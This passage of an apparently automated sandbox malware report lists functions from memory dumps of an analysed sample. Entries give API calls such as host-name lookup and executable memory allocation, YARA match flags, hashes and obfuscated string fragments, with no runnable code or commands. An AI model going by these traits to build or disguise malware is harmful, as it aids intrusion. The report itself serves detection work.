                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                                                                              • Opcode ID: 010c4b1e04f494671fc6a4b3cc0d403b049cf30c780ab17d6453ff73d6dd8c41
                                                                                                                                                                                                              • Instruction ID: d95c8ecd692f4bec92114f4d62421e6f35695d243453751eec6d32364b072da9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 010c4b1e04f494671fc6a4b3cc0d403b049cf30c780ab17d6453ff73d6dd8c41
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D341A7B4D10B40AFD370EF399A0B7537EB8AB05250F504B1DF8EA866D4E631A4198BD7
                                                                                                                                                                                                              Function 0042AB53 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0042AB88
                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042AC39
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ComputerFreeLibraryName
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2904949787-0
                                                                                                                                                                                                              • Opcode ID: a1aadd7f6043838332453e488da05ca5de1eaa8bfe1bf69e04609d45d61b36a9
                                                                                                                                                                                                              • Instruction ID: 1d220b90e383f93bd06f9216512391aaade2091b89470361c53069a5372c44ed
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1aadd7f6043838332453e488da05ca5de1eaa8bfe1bf69e04609d45d61b36a9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B21B33020C3C19BD7268F25D8147EBBBE1AF97305F44486ED5C9CB292CB794856DB16
                                                                                                                                                                                                              Function 0042AB51 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0042AB88
                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042AC39
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ComputerFreeLibraryName
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2904949787-0
                                                                                                                                                                                                              • Opcode ID: 465699b8d7096cbe76f5df897206770f9c9eeb529d7b583833dda5fad566039d
                                                                                                                                                                                                              • Instruction ID: ac40c3e64a2f06ae61f8209eefae7a19de8612d59b8514b7d047c7a325bf0907
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 465699b8d7096cbe76f5df897206770f9c9eeb529d7b583833dda5fad566039d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F211013020C3C19BE3258F22E8047EB7BE1AB96305F54482ED5CACB281CB784852DB17
                                                                                                                                                                                                              Function 02470E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetErrorMode.KERNELBASE(00000400,?,?,02470223,?,?), ref: 02470E19
                                                                                                                                                                                                              • SetErrorMode.KERNELBASE(00000000,?,?,02470223,?,?), ref: 02470E1E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorMode
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2340568224-0
                                                                                                                                                                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                              • Instruction ID: df7174f9f57e46548dd531f3c2dfcdef14bbfe03a49bac81fa522fe882d0dbf2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22D0123114512877D7002A94DC09BCE7B1CDF09B66F008011FB0DD9180C770954046E5
                                                                                                                                                                                                              Function 0042AAE3 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042AC39
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ComputerName
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3545744682-0
                                                                                                                                                                                                              • Opcode ID: a29c0b4e8e20e07660a0cfeaa5f6d4666fa48e11b61c0ae79d3c4accf39f9ca5
                                                                                                                                                                                                              • Instruction ID: 3b15dd803cac88ab808b5016d7ff937d32480cc153f4fd698af8c56e063e61c0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a29c0b4e8e20e07660a0cfeaa5f6d4666fa48e11b61c0ae79d3c4accf39f9ca5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A11E73420C3C19BE3258F25E4047EB7BE5AB96315F54482ED5C9DB381CB798852DB17
                                                                                                                                                                                                              Function 0043CDEC Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0043CE42
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ForegroundWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2020703349-0
                                                                                                                                                                                                              • Opcode ID: 422004b6d147e73250c664103a74d45d284f630feee2c75be69ae0605214b0de
                                                                                                                                                                                                              • Instruction ID: 8e9d37ad766b89a29780eeb19f9eec69eee8555c5ada2d7fc2e8f6db5c488741
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 422004b6d147e73250c664103a74d45d284f630feee2c75be69ae0605214b0de
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3CF0F676A082544BC718DB31D84215B77E29796304F58983DD947C7352E939C8068B49
                                                                                                                                                                                                              Function 0043CC70 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlReAllocateHeap.NTDLL(?,00000000), ref: 0043CCB0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                              • Opcode ID: 892e138075ea5a956f1afd7d3e91160fb2a7768f3755773556c80d767305e581
                                                                                                                                                                                                              • Instruction ID: 1cbdf2f1f7f0a6305c3e7450a012b98e443e362c599cbebba81cf89b6285e519
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 892e138075ea5a956f1afd7d3e91160fb2a7768f3755773556c80d767305e581
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64F0E576514214EBD7411B25BD05B1B3664EFCB710F06583EF80567161EB38D802CADA
                                                                                                                                                                                                              Function 0042E029 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BlanketProxy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3890896728-0
                                                                                                                                                                                                              • Opcode ID: bb8df7f2b81ee5a1d0b57f7a8ae00ca5bc8daeb2dbf179bc2ea826300ae52f39
                                                                                                                                                                                                              • Instruction ID: 4df7a3604d1f4d95daad38cfca757d10eae07dc6e1da8c899251ea778ed5a1ef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb8df7f2b81ee5a1d0b57f7a8ae00ca5bc8daeb2dbf179bc2ea826300ae52f39
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55F0E7B52097028FD301CF25C45470BBBE1BBC4314F25891CE0944B354C7B5EA498FC2
                                                                                                                                                                                                              Function 00431742 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BlanketProxy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3890896728-0
                                                                                                                                                                                                              • Opcode ID: 75ae1ae23edabd0616b05acb286f7a9b84eff8210e36c75aef8cbb861035801e
                                                                                                                                                                                                              • Instruction ID: 14f52a727b27a4c47d294ee183fde2a75ee7922183f5ff07c57c2dcb81f78ffb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75ae1ae23edabd0616b05acb286f7a9b84eff8210e36c75aef8cbb861035801e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37F0DFB4A093128FE311DF24C56971BBBE0AB88314F51891CE4949B290C3B99A498BC2
                                                                                                                                                                                                              Function 0043B160 Relevance: 1.5, APIs: 1, Instructions: 18memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,00000000,?,0043CCC9), ref: 0043B191
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                              • Opcode ID: 608cedfccbbf481f8e401043c18315b1c04c4d5b3f3da65999cdb297b3b7b5b2
                                                                                                                                                                                                              • Instruction ID: 3f498c724aab9959a3b29728e932f0d8bb988b949dec240799eec3c50057edb1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 608cedfccbbf481f8e401043c18315b1c04c4d5b3f3da65999cdb297b3b7b5b2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45D01235105122FBC6502B55BC017CB3754AF49311F1608B6E401560B1EA348C418E99
                                                                                                                                                                                                              Function 0040CA84 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CA96
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeSecurity
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 640775948-0
                                                                                                                                                                                                              • Opcode ID: 74c2f83be96e840124e7525c87e1fe0546c9548efc227c833e10c378a6e3cf8e
                                                                                                                                                                                                              • Instruction ID: 7c0d98bce72ca0fe3c5e96c7b3cbae874c361722319ecc0000526e4895fec6d3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74c2f83be96e840124e7525c87e1fe0546c9548efc227c833e10c378a6e3cf8e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FD0C9343C43407AF1644758ED53F143260A782F11FB40228B326FE6D1C9E0B111861C
                                                                                                                                                                                                              Function 0043CE34 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0043CE42
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ForegroundWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2020703349-0
                                                                                                                                                                                                              • Opcode ID: 42811b8c73c6627804d48a2153b96f9cb1ea9daba6b0de4a15ad7b18b9359105
                                                                                                                                                                                                              • Instruction ID: 6a59fd0b47f8ad06e7618dab901bc5d0710017031ba22dab694b2b4113fdbacc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42811b8c73c6627804d48a2153b96f9cb1ea9daba6b0de4a15ad7b18b9359105
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0D017BD9003649FC604EF25EC4652533A4A74A2453900839EA03C33A3EA75A906CE0C
                                                                                                                                                                                                              Function 0043B13B Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043B141
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                              • Opcode ID: 4cc3f4b3a9d1bd60b995f4b524ac0e89f875f515073a93caf55134494d1bd910
                                                                                                                                                                                                              • Instruction ID: 5935400ee05eb42da44788acde9fab82ecb3a08923c60ef96b1e378cd26b7281
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4cc3f4b3a9d1bd60b995f4b524ac0e89f875f515073a93caf55134494d1bd910
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CEA01130080220AACA202B00BC08FCA3E20EB80222F0200A0B002080B282B08882CA88
                                                                                                                                                                                                              Function 008DAE75 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008DAEC6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532069127.00000000008DA000.00000040.00000020.00020000.00000000.sdmp, Offset: 008DA000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8da000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                              • Instruction ID: 497d52174a86c93bab95a0a24f869c050156a04156c518347a338eaf3b351d99
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66115B79A00208EFCB01DF98C985E98BBF1EF08350F158095F9489B362D731EA90DB81

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 024A5A3A Relevance: 116.7, Strings: 93, Instructions: 424COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $!$"$"$#$%$'$)$)$*$*$+$-$/$0$1$2$2$3$4$5$6$7$7$9$9$:$;$<$<$=$=$?$@$@$A$C$E$G$H$I$I$J$K$K$M$M$O$Q$Q$Q$R$S$U$V$V$W$Y$[$[$]$]$_$a$b$c$e$f$g$i$jW}U$k$k$m$n$n$o$o$q$r$s$u$u$u$w$w$w$x$y$y$y${$}
                                                                                                                                                                                                              • API String ID: 0-2941195327
                                                                                                                                                                                                              • Opcode ID: e50b29eb7f514e7ece38cf6384aa5274311c420c84c51c49a0245f179b4fbd25
                                                                                                                                                                                                              • Instruction ID: eaefd49f985f01ef7c95af4a3561ecde55f798a405dde1ccb34c5ef52abd2b13
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e50b29eb7f514e7ece38cf6384aa5274311c420c84c51c49a0245f179b4fbd25
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A22543090C6E9CDEB26C628CC187DDBEA15B66314F0881D9C5DD6B3C2C7B94A85CB66
                                                                                                                                                                                                              Function 024A66CE Relevance: 64.1, Strings: 51, Instructions: 336COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: "$%$($)$*$+$,$,$-$0$5$6$:$<$>$@$A$B$D$F$I$L$P$R$T$T$U$V$X$Z$\$^$`$b$d$f$g$h$j$jW}U$l$n$p$r$t$v$w$x$z$|$~
                                                                                                                                                                                                              • API String ID: 0-350411598
                                                                                                                                                                                                              • Opcode ID: 3a296a68ecd6b985a7aa005b68eed387e975006c4e95b4c94706ec92968f1691
                                                                                                                                                                                                              • Instruction ID: 8502591322855d705f24ad365f97f36faf0cc2dcca370ab942e513f234bf859f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a296a68ecd6b985a7aa005b68eed387e975006c4e95b4c94706ec92968f1691
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52F1C621D087E98ADB26C67C88543CDBFB15B66314F0942DDC4E87B3D2C7B90A49CB66
                                                                                                                                                                                                              Function 00436467 Relevance: 64.1, Strings: 51, Instructions: 336COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID: "$%$($)$*$+$,$,$-$0$5$6$:$<$>$@$A$B$D$F$I$L$P$R$T$T$U$V$X$Z$\$^$`$b$d$f$g$h$j$jW}U$l$n$p$r$t$v$w$x$z$|$~
                                                                                                                                                                                                              • API String ID: 2994545307-350411598
                                                                                                                                                                                                              • Opcode ID: 10994b25095715d3c07bd179171c8be1e146900c471e67b687a985a0d9b88cd9
                                                                                                                                                                                                              • Instruction ID: 3b2945c37613141cb0df42078c58c115b3d13bc74c53d7464d389b01b7946f0b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10994b25095715d3c07bd179171c8be1e146900c471e67b687a985a0d9b88cd9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6F1E521D087E98ADB22C67C88443CDBFB15B56324F1942DDC4E87B3D2C7B90A49CB66
                                                                                                                                                                                                              Function 00423300 Relevance: 51.8, APIs: 2, Strings: 27, Instructions: 1037COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,31B1BEFD,0000001E,00000000,00000000,31B1BEBB), ref: 004233E4
                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,31B1BEFD,0000001E,00000000,?,31B1BEBB), ref: 00423461
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                              • String ID: 'P#V$(\*b$*@2F$6Y$E0T6$E4A:$G:$I<JB$N$Y$Z,[2$ZY$^Q$_R$a"_\$a8\>$eC$g4a:$j8n>$n<l"$p$c*$s(q.$w(n.$y0{6$yv$T*$
                                                                                                                                                                                                              • API String ID: 237503144-1431619414
                                                                                                                                                                                                              • Opcode ID: efb8f8f0079cccf54d6554feda36f9e3b0062e8fc2309439d472f91ce72ac2b7
                                                                                                                                                                                                              • Instruction ID: 78bca97211586e5d62953f3c3add26d81951743f6224714071837b6a2964b743
                                                                                                                                                                                                              • Opcode Fuzzy Hash: efb8f8f0079cccf54d6554feda36f9e3b0062e8fc2309439d472f91ce72ac2b7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A59273B560C3908BD334CF64D84179BBAE1FBC2304F44892DD5E9AB251D7B99906CB8B
                                                                                                                                                                                                              Function 004235C0 Relevance: 50.0, APIs: 1, Strings: 27, Instructions: 981COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 'P#V$(\*b$*@2F$6Y$E0T6$E4A:$G:$I<JB$N$Y$Z,[2$ZY$^Q$_R$a"_\$a8\>$eC$g4a:$j8n>$n<l"$p$c*$s(q.$w(n.$y0{6$yv$T*$
                                                                                                                                                                                                              • API String ID: 0-1431619414
                                                                                                                                                                                                              • Opcode ID: a03041a7daafffe8a9feedea5928b06e78d931e21610da2177377330fa5b30d5
                                                                                                                                                                                                              • Instruction ID: 7d6b2742840b3886850745b9f25048588997c5f3f642c56be9e69fde27abc2c4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a03041a7daafffe8a9feedea5928b06e78d931e21610da2177377330fa5b30d5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 429285B560C3908BD330CF64D84179BBAE1FBC2304F44892DD6E9AB252D7799546CB8B
                                                                                                                                                                                                              Function 02493A07 Relevance: 31.7, Strings: 25, Instructions: 428COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 'P#V$(\*b$*@2F$6Y$E0T6$E4A:$G:$I<JB$N$Y$Z,[2$ZY$^Q$_R$a8\>$eC$g4a:$j8n>$n<l"$p$c*$s(q.$w(n.$y0{6$yv$T*
                                                                                                                                                                                                              • API String ID: 0-3512105184
                                                                                                                                                                                                              • Opcode ID: a3aa50b617ac8817bd1ab878953f6fc51667aa84756db8149849b51cc108a9aa
                                                                                                                                                                                                              • Instruction ID: 192ee2e373a44b44539c6518fa321acf02ea27070fb821bacbab38c7cc12ab8c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3aa50b617ac8817bd1ab878953f6fc51667aa84756db8149849b51cc108a9aa
